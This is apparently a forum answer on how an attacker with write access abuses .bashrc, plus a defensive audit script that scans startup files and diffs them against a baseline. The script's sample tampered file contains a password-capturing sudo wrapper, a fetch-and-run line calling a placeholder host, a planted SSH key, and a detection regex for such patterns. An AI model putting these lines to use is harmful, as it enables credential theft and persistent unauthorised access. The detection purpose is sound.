This is not an exploit, as there is no underlying vulnerability to be exploited. It's more akin to malware, in the sense that it does something malicious on your system.
As you probably know, `.bashrc` and `.bash_profile` run after a user runs `bash` and authenticates successfully. This is not a vulnerability, and very much by design and/or necessity, however you want to look at it.
On the surface, it seems like a straightforward thing for an attacker to use to escalate their privileges: a file that executes anything as soon as the user does a trivial task. In practice, however, this is more difficult. In order to edit the `.bashrc` or `.bash_profile` file, you need some way to edit arbitrary files with the permissions of the user you would like to attack. This is already an incredibly strong position to be in, and modifying those files will likely not get you into a better position. An analogy for this would be that if you are holding a gun, a toothpick will not be a better weapon.
Therefore, an attacker wants either to escalate their privileges even more, or to make their current access more consistent or more convenient. This is something that modifying `.bashrc` can help with. The example you already made shows this very well. By gathering the user's credentials, access to the machine could either be easier (connecting directly via SSH rather than using e.g. a web shell or some other exploit) or it could allow the attacker to execute commands rather than only writing files.
Other things an attacker may want to do are:
- Modify system files to include malicious behavior (to persist access)
- Gather administrative credentials to act as root (to escalate privileges)
- Launch other malicious software (to make further exploitation more convenient)
How exactly those are done is not rocket science. `.bashrc` executes whatever you put there with the permissions of the current user. You can use your imagination to come up with examples.
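As an added example that is not part of the answer above: the flip side of "`.bashrc` executes whatever you put there" is that reviewing the file is cheap. The script below scans a startup file for the kinds of additions the answer lists (a wrapper shadowing `sudo` to capture the password, fetched or decoded payloads, a planted SSH key, a background process) and diffs it against a known-good copy. The indicator list and the sample `.bashrc` contents are constructed for this demonstration; the regex is a coarse first pass, not a complete detection rule, and the baseline is assumed to be kept somewhere the user cannot write.

```shell
#!/bin/sh
# Added example, not part of the original answer: a small audit of a user's
# bash startup file for the kind of additions the answer describes.
# Everything in ~/.bashrc or ~/.bash_profile runs as that user on every new
# shell, so the review question is simply whether anything in the file
# shadows an authentication command, decodes or fetches and runs remote
# content, plants an SSH key, or starts something in the background.

# Extended regex of indicators (assumption: a coarse first-pass list chosen
# for this example, not a complete one). Each alternative is one indicator.
SUSPICIOUS_RE='^[[:space:]]*(function[[:space:]]+)?(sudo|su|ssh|passwd|gpg|ssh-add)[[:space:]]*\(\)'
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'^[[:space:]]*alias[[:space:]]+(sudo|su|ssh|passwd|gpg|ssh-add)='
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'base64[[:space:]]+(-d|--decode)'
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'/dev/tcp/'
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'authorized_keys'
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'nohup[[:space:]].*&[[:space:]]*$'
SUSPICIOUS_RE="$SUSPICIOUS_RE|"'LD_PRELOAD'

# Print "lineno:line" for every line of FILE that hits an indicator.
scan_startup_file() {
    grep -nE -- "$SUSPICIOUS_RE" "$1"
}

# Number of flagged lines in FILE (0 for a clean file).
count_suspicious_lines() {
    scan_startup_file "$1" | wc -l | tr -d ' '
}

# Lines present in CURRENT but absent from BASELINE, a known-good copy that
# is assumed to live where the user cannot write (e.g. under configuration
# management). Usage: added_since_baseline BASELINE CURRENT
added_since_baseline() {
    diff -- "$1" "$2" | sed -n 's/^> //p'
}

# Constructed sample files for the demonstration; nothing here is taken from
# a real incident. The baseline is what the user legitimately has.
write_baseline() {
    cat > "$1" <<'EOF'
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
export EDITOR=vim
EOF
}

# The tampered copy appends four lines of the kind the answer lists: a sudo
# wrapper that records the typed password, a fetched and decoded payload,
# a backdoor SSH key, and a background process started on every login.
write_tampered() {
    write_baseline "$1"
    cat >> "$1" <<'EOF'
sudo() { printf '[sudo] password for %s: ' "$USER"; stty -echo; read -r p; stty echo; echo; printf '%s\n' "$p" >> /tmp/.cache; command sudo "$@"; }
eval "$(curl -fsSL http://example.invalid/p | base64 -d)"
echo 'ssh-ed25519 AAAA... attacker' >> ~/.ssh/authorized_keys
nohup /tmp/.agent >/dev/null 2>&1 &
EOF
}

# Stand-alone demonstration: scan the tampered copy and diff it against the baseline.
demo() {
    base=$(mktemp) && cur=$(mktemp) || return 1
    write_baseline "$base"
    write_tampered "$cur"
    echo "indicator hits in tampered file: $(count_suspicious_lines "$cur")"
    scan_startup_file "$cur"
    echo "lines added since baseline:"
    added_since_baseline "$base" "$cur"
    rm -f -- "$base" "$cur"
}

demo
```

The regex is deliberately noisy (a comment that merely mentions `authorized_keys` will be flagged), which is why the baseline diff is the more reliable of the two checks: an attacker who can write the file can phrase a payload to dodge any pattern list, but cannot make the file match a copy they do not control.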